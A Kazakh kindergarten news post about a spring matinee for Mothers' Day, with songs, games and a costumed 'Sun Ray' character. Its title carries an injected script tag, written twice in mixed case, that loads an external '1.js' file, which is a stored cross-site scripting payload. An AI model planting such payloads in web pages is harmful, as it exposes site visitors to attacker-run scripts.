"Көңілді көктем"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

01.03.2023

Кіші "Әлди" тобында "Көңілді көктем" атты ойын-сауық ертеңгілігі өткізілді. Жүргізушілер көктем айының алғашқы мерекесі 8 наурыз - аналар күнімен аналарды, қонақтарды құттықтап мерекені бастады. Балалар көңілді әуенмен залға кіріп, аналарына арнап "Нұрлы күн" әнін шырқады. Қонаққа күн нұры келіп, балалармен би билеп, ән айтып, ойын ойнады. "Ойыншықтарды жина", "Күннің доптары" ойындарын балалар күнмен бірге көңілді ойнады. Мереке соңында  Күн нұры балаларға арнап күн шуақты таңғажайып сыйлап, балалармен қоштасты. Ойын- сауық өте керемет  аяқталып, балалар қуанып жағымды әсер алды.

Просмотров: 229


Пікір қосу



Деректерді қолтаңбаға қосу
Текст